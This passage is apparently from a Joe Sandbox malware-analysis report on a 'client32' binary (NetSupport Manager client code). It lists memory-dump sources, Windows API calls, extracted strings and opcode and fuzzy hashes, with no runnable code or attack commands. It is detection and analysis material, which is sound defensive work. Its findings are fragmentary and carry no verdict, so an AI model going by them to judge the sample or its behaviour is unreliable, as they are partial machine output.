                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Item$Delete$Count
                                                                                • String ID:
                                                                                • API String ID: 1985338998-0
                                                                                • Opcode ID: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
                                                                                • Instruction ID: 1fd4eba2895a352ce9ef292ca712417bb50dbed27225d5083b87c16346d81a74
                                                                                • Opcode Fuzzy Hash: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
                                                                                • Instruction Fuzzy Hash: 7611817181422BBBF7059B60CDC8AAFF7BCEF45A19F204229F92592440E7749544CBA1
                                                                                APIs
                                                                                  • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                  • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                • GetParent.USER32(00000000), ref: 11089996
                                                                                • GetParent.USER32(00000000), ref: 110899A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ParentWindow
                                                                                • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                • API String ID: 3530579756-3361795001
                                                                                • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                                • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                                APIs
                                                                                  • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,1B702977,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1101B776
                                                                                • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                Strings
                                                                                • NSSecurity.dll, xrefs: 1101B7A3
                                                                                • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                • API String ID: 3515807602-1044166025
                                                                                • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,1B702977,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071824
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                • API String ID: 624642848-3840833929
                                                                                • Opcode ID: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                                • Opcode Fuzzy Hash: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closewsprintf
                                                                                • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                • API String ID: 4060989581-4096285074
                                                                                • Opcode ID: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
                                                                                • Instruction ID: f393627671fb017ea66c5cc56c7c64c93c0c73457dc74dc6be4a09c67f558207
                                                                                • Opcode Fuzzy Hash: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
                                                                                • Instruction Fuzzy Hash: F14106B5E006699BD725CB64CC80FEEB3B8EF45308F1045E8EA5997680EB31AE44CF55
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closewsprintf
                                                                                • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                • API String ID: 4060989581-4096285074
                                                                                • Opcode ID: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
                                                                                • Instruction ID: 0c1333cb51f3e687940ac8a863b18b978c2e00f876245ba0d4622cc4c938ac8c
                                                                                • Opcode Fuzzy Hash: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
                                                                                • Instruction Fuzzy Hash: 1B4106B5E006699BD715CB64CC80FEEB3B8EF45308F1045E8EA5997280EB31AE44CF55
                                                                                APIs
                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                  • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 3136964118-2830328467
                                                                                • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                                • _free.LIBCMT ref: 110ED81C
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _malloc.LIBCMT ref: 110ED82E
                                                                                • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                • _free.LIBCMT ref: 110ED8E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                • String ID: Error %d getting %s
                                                                                • API String ID: 582965682-2709163689
                                                                                • Opcode ID: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                                • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                • Opcode Fuzzy Hash: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                                • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9
                                                                                  • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
                                                                                  • Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
                                                                                  • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
                                                                                • _memmove.LIBCMT ref: 1100FA4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 443534600-4289949731
                                                                                • Opcode ID: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                • Instruction ID: dd7b0a9210ae89047594a984bf0db1b74830ff0f253f3c884b4c9459fb9d7564
                                                                                • Opcode Fuzzy Hash: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                • Instruction Fuzzy Hash: 1031FE72B04205CFE715CE5DE880A5AF7D9EF957A4B10062FE551CB240D771EC80D792
                                                                                APIs
                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                • IsWindow.USER32(?), ref: 1103D17E
                                                                                • SendMessageA.USER32(?,0000004A,00040310,00000492), ref: 1103D1B8
                                                                                • _free.LIBCMT ref: 1103D1BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                • String ID: Show16
                                                                                • API String ID: 625148989-2844191965
                                                                                • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                APIs
                                                                                  • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • IsA(), xrefs: 1100968D, 110096B5
                                                                                • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
